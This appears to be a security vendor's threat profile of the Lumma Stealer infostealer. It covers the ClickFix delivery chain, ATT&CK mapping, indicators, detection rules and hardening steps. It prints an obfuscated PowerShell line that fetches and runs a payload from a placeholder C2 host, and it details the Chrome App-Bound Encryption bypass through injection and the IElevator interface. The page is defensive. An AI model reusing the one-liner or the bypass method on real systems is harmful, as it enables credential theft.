Home

Lumma Stealer

Infostealer (MaaS) · First seen August 2022

Overview

Lumma Stealer is a Windows-targeting infostealer operated as malware-as-a-service since August 2022. Microsoft tracks the operator family as Storm-2477. Affiliates rent the malware on Russian-speaking cybercrime forums under tiered subscriptions, with full source code reportedly priced at around $20,000. Once executed, Lumma harvests browser-saved credentials, session cookies, multi-factor authentication tokens, cryptocurrency wallet data, and local authentication artifacts, then exfiltrates to attacker-controlled infrastructure.

It is the most widely deployed infostealer of the past two years. Microsoft identified 394,000 infected Windows hosts in a 90-day window ending May 2025; the FBI estimates 10 million cumulative infections globally. Microsoft describes Lumma as the most prolific ClickFix final payload based on its own threat-hunting data.

Lumma's infrastructure was disrupted in a May 2025 coordinated action by Microsoft's Digital Crimes Unit, the US Department of Justice, Europol, and Japan's Cybercrime Control Center. The operation disrupted approximately 2,300 malicious domains, with 1,300+ seized or transferred to Microsoft. Lumma rebuilt within days and remains active. The most recent documented evolution is a Windows Terminal-based delivery variant disclosed by Microsoft Threat Intelligence on March 5, 2026.

Lumma is not used directly for ransomware deployment. It is a credential-acquisition tool that feeds the broader ransomware ecosystem. Stolen credentials are sold to initial-access brokers and ultimately to ransomware operators, most notably Octo Tempest, also tracked as Scattered Spider.

Operational attack chain · ClickFix-to-Lumma
  1. Start

    Malicious website

    Malvertising · crack lure · phishing

  2. Stage 1

    Fake CAPTCHA

    JS hijacks clipboard

  3. Stage 2 — user

    Win+R → paste → Enter

    explorer / wt.exe parent

  4. Stage 3

    PowerShell fetches loader

    powershell -w h … | iex

    CastleLoaderIDATEmmenhtal
  5. Stage 4

    Injected into browser

    QueueUserAPC() → chrome / edge

  6. Stage 5

    ABE bypass · credentials stolen

    IElevator COM → Login Data · cookies · wallets

  7. Impact

    Sold to IABs

    → ransomware operators

ClickFix is the dominant delivery method. Other vectors — direct installer download, GitHub fake repos, phishing attachments — skip stages 1—2 entirely.

Tactics, techniques, and procedures

Lumma maps to multiple MITRE ATT&CK Enterprise tactics, with the highest technique density in Execution and Defense Evasion. The coverage map below combines official Lumma software mappings with observed ClickFix delivery behavior.

MITRE ATT&CK coverageHeavyActiveNot observed
Recon0Resource Dev0Initial Access2Execution3Persistence2Priv. Esc0Defense Evasion5Credential Access2Discovery2Lateral0Collection2C22Exfiltration1Impact0
Technique detailKey techniques · Lumma Stealer
TacticTechniquesWhat Lumma does
Initial Access
Spearphishing Link T1566.002Drive-by Compromise T1189
Phishing links and compromised sites funnel victims to fake CAPTCHA or cracked software lure pages.
Execution
PowerShell T1059.001Malicious File T1204.002System Binary Proxy T1218
User pastes clipboard command into Run dialog or Windows Terminal. PowerShell, mshta, or MSBuild executes — no exploit, no CVE.
Persistence
Registry Run Keys T1547.001Scheduled Task T1053.005
Registry Run keys or scheduled tasks, affiliate-configured. Many campaigns skip persistence — first execution already completes the theft.
Defense Evasion
Obfuscated Files T1027Deobfuscate / Decode T1140Sandbox Evasion T1497DLL Side-Loading T1574.002APC Injection T1055.004
Clipboard payload padded with whitespace. Loaders detect VMs before decrypting, obfuscate across multiple layers, and sideload via signed binaries so the parent process appears trusted. QueueUserAPC() injection into chrome.exe is the mechanism that defeats ABE's process-identity check — injection is not just evasion here, it is the prerequisite for credential access.
Credential Access
Credentials from Browsers T1555.003Steal Web Session Cookie T1539
Decrypts credentials via DPAPI (blob prefix v10, Chrome <127) or ABE bypass (blob prefix v20, Chrome 127+). Encryption key sourced from Local State. Data targets: Login Data, Cookies, Web Data. Steals session cookies with HttpOnly/Secure flags intact — bypasses MFA without cracking the second factor.
Discovery
System Information T1082File Discovery T1083
Collects hardware ID, OS version, installed software. Used to fingerprint and price the compromised machine before selling access.
Collection
Clipboard Data T1115Local System Data T1005
Enumerates 80+ crypto wallet apps and browser extensions, VPN configs, email clients, FTP clients, and Telegram data.
Command and Control
Web Protocols T1071.001DNS T1071.004
HTTPS POST to rotating C2. DNS variant retrieves payload fragments via TXT records. Post-takedown C2 shifted from Cloudflare to Selectel (Russian hosting).
Exfiltration
Exfiltration Over C2 T1041
All stolen data sent over the C2 channel. Traffic typically under 500KB per host — below most DLP thresholds.
Recon / Resource Dev / Priv Esc / Lateral / ImpactNot observed. Handled by operators or downstream ransomware affiliates.
Stage 1T1566.002 · T1204.002 · T1115

The ClickFix lure

Lumma is delivered through ClickFix, a social engineering technique that has become the single most common Windows initial-access method. Microsoft's 2025 Digital Defense Report attributes 47% of observed attacks to ClickFix, outpacing traditional phishing.

The lure page renders a fake Cloudflare Turnstile, Google reCAPTCHA, browser update prompt, or document-viewer error. When the victim clicks "verify," hidden JavaScript silently writes a malicious command to the clipboard. The page then displays a three-step instruction: Win+R, Ctrl+V, Enter.

A February 2026 variant disclosed by Microsoft Threat Intelligence instructs Win+X then I instead, launching Windows Terminal. The change defeats EDR rules tuned for Run-dialog parentage.

ClickFix is not the only delivery vector. Other active Lumma distribution methods include: direct installer download via malvertising (user downloads a signed MSI or ZIP, no clipboard involved); fake GitHub repositories with AI-generated READMEs promoting game cheats or cracked tools; phishing email attachments (password-protected ZIP containing an LNK or MSI); and social media lures via YouTube and Facebook linking to Google Sites-hosted payloads. These vectors skip the clipboard stages entirely and enter the kill chain at Stage 3 (loader execution). Detection coverage for these paths relies on Stages 3—5 rather than clipboard-to-process correlation.

Stage 2T1059.001 · T1027 · T1140 · T1218

The clipboard payload

The string placed on the clipboard is almost always obfuscated. A representative pattern observed in live campaigns:

Representative PowerShell payload
powershell -w h -c "$u=[int64](([datetime]::UtcNow-[datetime]'1970-1-1').TotalSeconds)-band 0xfffffffffffffff0;irm hxxp://[C2_IP]:8080/$u|iex"

Pattern documented in Microsoft Threat Intelligence reporting

Three techniques stack in that single line. The -w h flag hides the PowerShell window. The irm call (Invoke-RestMethod) fetches a remote payload. The URL path is a time bucket — the command builds a URL like hxxp://[C2]:8080/1746403200 where the number is the current Unix timestamp rounded down to a 16-second window (the -band 0xfffffffffffffff0 strips the last 4 bits). The C2 server only serves the payload during that specific window. If a security analyst captures the command and replays it ten minutes later, the URL path has changed and the server returns nothing — the payload is ephemeral and cannot be retrieved after the fact for inspection.

Other delivery variants observed in current campaigns:

  • mshta.exe fetching an HTA containing VBScript (T1218.005)
  • nslookup -type=txt retrieving base64 payload fragments in DNS TXT records (T1071.004)
  • MSBuild.exe invoked from a batch-to-VBScript chain communicating with blockchain RPC endpoints for EtherHiding-based C2
Stage 3T1055 · T1574.002 · T1497 · T1620

The loader

The clipboard command does not deliver Lumma directly. It delivers a loader. Three loaders dominate current Lumma campaigns: CastleLoader (in-memory execution, multiple obfuscation layers), IDAT Loader (DLL sideloading via legitimate signed applications), and Emmenhtal / PEAKLIGHT (used in the ClearFake cluster, leverages EtherHiding to store payload fragments inside Binance Smart Chain smart contracts).

All three decrypt the Lumma payload in memory and never write an unpacked executable to disk. The payload is injected into running browser processes using the QueueUserAPC() API, targeting chrome.exe and msedge.exe.

Stage 4T1555.003 · T1539 · T1055.004 · T1115 · T1041

Credential theft and exfiltration

Lumma targets Chromium credential storage across two protection models depending on Chrome version. The encryption key is stored in Local State (the JSON file containing os_crypt.encrypted_key). The data targets are Login Data, Cookies, and Web Data SQLite files.

DPAPI (blob prefix v10, Chrome <127). Chrome historically encrypted the master key using Windows DPAPI (CryptProtectData). DPAPI binds decryption to the user's login session, not to a specific process — any process running in the same user context can call CryptUnprotectData to recover the key. This is why classic infostealers could simply copy browser files to a temp folder and decrypt them externally. No injection required for this path.

App-Bound Encryption bypass (blob prefix v20, Chrome 127+). Google introduced ABE in Chrome 127 specifically to close the DPAPI gap. ABE binds the master key to the browser's process identity via Chrome's IElevator COM service, which validates the caller before releasing the key. Any process outside chrome.exe is refused — this is why injection is required for v20 blobs. Injection is the mechanism that defeats ABE's process-identity check.

Once injected into chrome.exe via QueueUserAPC(), Lumma code runs inside the trusted process context. From there it calls Chrome's IElevator COM interface ({708860E0-F641-4611-8895-7D867DD3675B}). Because the call originates from inside chrome.exe, ABE's process-identity check passes. The interface returns the plaintext AES key, which Lumma uses to decrypt v20 cookies and passwords from the SQLite files.

Firefox is targeted separately through logins.json and key4.db, which use NSS (Network Security Services) encryption decryptable from within the user session context.

Browser cookies are exported with HttpOnly and Secure flags intact. This is how Lumma bypasses MFA: it does not crack the second factor — it steals the post-authentication session token and replays it. The February 2026 campaign additionally dropped Lumma to C:\ProgramData\app_config\ctjb and established scheduled-task persistence.

Process tree

What the kill chain looks like in EDR telemetry

Indicators of compromise

The indicators below are durable: file paths, registry keys, process patterns, and network behaviors that have remained consistent across Lumma campaigns and survive variant rotation.

File paths

4 indicators

Locations where Lumma drops payload, persistence, or staging artifacts.

  • C:\ProgramData\app_config\ctjbLumma payload drop, Feb 2026 campaign
  • %AppData%\...\Startup\*.lnkLNK shortcut persistence
  • %TEMP%\*.zipRenamed 7-Zip extraction artifacts
  • %LocalAppData%\Temp\*.exeLoader staging, often deleted post-execution

Registry keys

3 indicators

Registry locations Lumma reads, writes, or leaves trace evidence in.

  • HKCU\...\Explorer\RunMRUDurable forensic evidence of Run-dialog command
  • HKCU\...\CurrentVersion\RunPersistence when configured by affiliate
  • HKLM\...\TaskCache\TasksScheduled task persistence (Feb 2026)

Process tree patterns

5 patterns

Parent-child execution chains that signal a Lumma kill chain in progress.

  • explorer.exe → powershell.exe [encoded command]Classic Run-dialog ClickFix execution
  • explorer.exe → wt.exe → powershell.exeWindows Terminal variant, Feb 2026+
  • [signed binary].exe → [tampered].dll → LummaDLL sideloading via IDAT/HijackLoader
  • chrome.exe ← QueueUserAPC() from non-browserBrowser injection, Microsoft-documented
  • [non-browser] → reads Login Data / logins.jsonDirect credential database read

Network behavior

4 patterns

Outbound traffic patterns observable at firewall, proxy, or DNS layer.

  • *.trycloudflare.com (random subdomains)Cloudflare tunneling for C2
  • DNS TXT lookups · non-standard serversnslookup-based payload retrieval
  • HTTPS POST to short-lived domains (< 72h)Exfiltration to rotating C2
  • BNB Smart Chain RPC · non-wallet processesEtherHiding payload retrieval

Detection guidance

Lumma's kill chain leaves a distinctive correlation pattern in its early stages. Signature-based scanning misses the payload because each loader build mutates. Behavioral detection catches it because the chain combines clipboard activity, trusted-binary execution, and browser-process anomalies in a sequence that legitimate user activity does not produce.

  1. 01

    Clipboard-to-process correlation

    Endpoint telemetry

    Clipboard contents containing powershell, mshta, iex, nslookup, or base64 strings, followed within thirty seconds by execution of those same binaries with explorer.exe or wt.exe as parent.

    Why it works: legitimate users rarely paste these strings into the Run dialog. The thirty-second window correlates the lure with the execution.

  2. 02

    RunMRU registry writes

    Registry monitoring

    New entries written to HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU containing PowerShell, mshta, or encoded command syntax.

    Why it works: this key persists after the process exits, so the artifact is durable for forensic timelines.

  3. 03

    LOLBin parent-child anomalies

    EDR / process telemetry

    Alert on powershell.exe, mshta.exe, wscript.exe, rundll32.exe, nslookup.exe, or MSBuild.exe spawning as direct children of explorer.exe or wt.exe with encoded or remote-fetching command lines.

    Why it works: in a normal user environment these binaries should never have those parents with those arguments.

  4. 04

    Browser process injection

    EDR / API telemetry

    QueueUserAPC() calls into chrome.exe or msedge.exe from non-browser parent processes. Reads of logins.json, key4.db, or the Chromium Login Data SQLite file from any process other than the browser.

    Why it works: browsers self-read these files; outside processes never should.

  5. 05

    ABE bypass — IElevator COM instantiation

    EDR / COM telemetry

    COM instantiation of {708860E0-F641-4611-8895-7D867DD3675B} (Chrome's IElevator interface) from a thread context that originated outside chrome.exe — i.e., from an injected thread. Alert on any process other than a legitimate Chrome installation invoking this CLSID.

    Why it works: this is the direct indicator of an ABE bypass in progress. Legitimate IElevator calls originate from Chrome's own process; a call from an injected thread is unambiguous evidence of credential theft against Chrome 127+.

  6. 06

    Network anomalies

    Firewall / DNS / proxy logs

    Outbound connections to *.trycloudflare.com subdomains with random word patterns. Repeated DNS TXT-record queries against non-standard authoritative servers. Connections to blockchain RPC endpoints from non-wallet processes.

    Why it works: each pattern is a single-purpose tell — Cloudflare tunnels for C2, DNS for staged delivery, RPC for EtherHiding.

Hardening recommendations

The four configuration changes below block the majority of current ClickFix variants at zero licensing cost. None requires a new product purchase. Items are tagged by deployment difficulty: Quick win = single GPO or rule, deployable in days. Standard = needs audit-mode rollout, deployable in weeks.

  1. Disable the Windows Run dialog for non-admin users

    Quick win

    Set the NoRun Group Policy for user-tier accounts that do not need Run-dialog access. This single change defeats the most common ClickFix variant entirely.

    Path: User Configuration → Administrative Templates → Start Menu and Taskbar → Remove Run menu from Start Menu.

  2. Enable PowerShell script-block logging and Constrained Language Mode

    Quick win

    Script-block logging captures obfuscated commands before execution, surfacing payloads even when they self-delete. Constrained Language Mode restricts the PowerShell features attackers rely on for in-memory execution and reflection.

    Path: Computer Configuration → Administrative Templates → Windows Components → Windows PowerShell.

  3. Restrict LOLBin execution via AppLocker or WDAC

    Standard

    Block or restrict mshta.exe, wscript.exe, cscript.exe, MSBuild.exe, and SyncAppvPublishingServer.vbs for non-admin contexts.

    Path: Computer Configuration → Windows Settings → Security Settings → Application Control Policies. Audit-mode rollout first.

  4. Block or alert on Windows Terminal as a PowerShell parent

    Quick win

    The February 2026 ClickFix variant uses Windows Terminal (wt.exe) specifically because it bypasses Run-dialog detection rules.

    Path: Implement via EDR custom rule or AppLocker.

  5. Verify App-Bound Encryption is not disabled via policy

    Quick win

    ABE is enabled by default in Chrome 127+. Attackers with admin access can disable it via Group Policy or registry, reverting Chrome to DPAPI-only protection and making credential theft trivial without injection.

    Verify: Confirm HKLM\SOFTWARE\Policies\Google\Chrome\ApplicationBoundEncryptionEnabled is not set to 0. If the key exists with that value, ABE is disabled and Chrome credentials are unprotected against any process running in the user session. Alert on writes to this key.

How Malware Protection Plus responds

A walkthrough showing detection of the LOLBin execution chain, automated containment of the affected endpoint, and forensic capture of the command artifacts.

Primary references

Source material this page is built on. Last reviewed against Microsoft Threat Intelligence reporting through March 2026.

Test your defenses against ClickFix-to-Lumma kill chains.

Malware Protection Plus catches the behavioral patterns that signature-based tools miss.

Start free trial →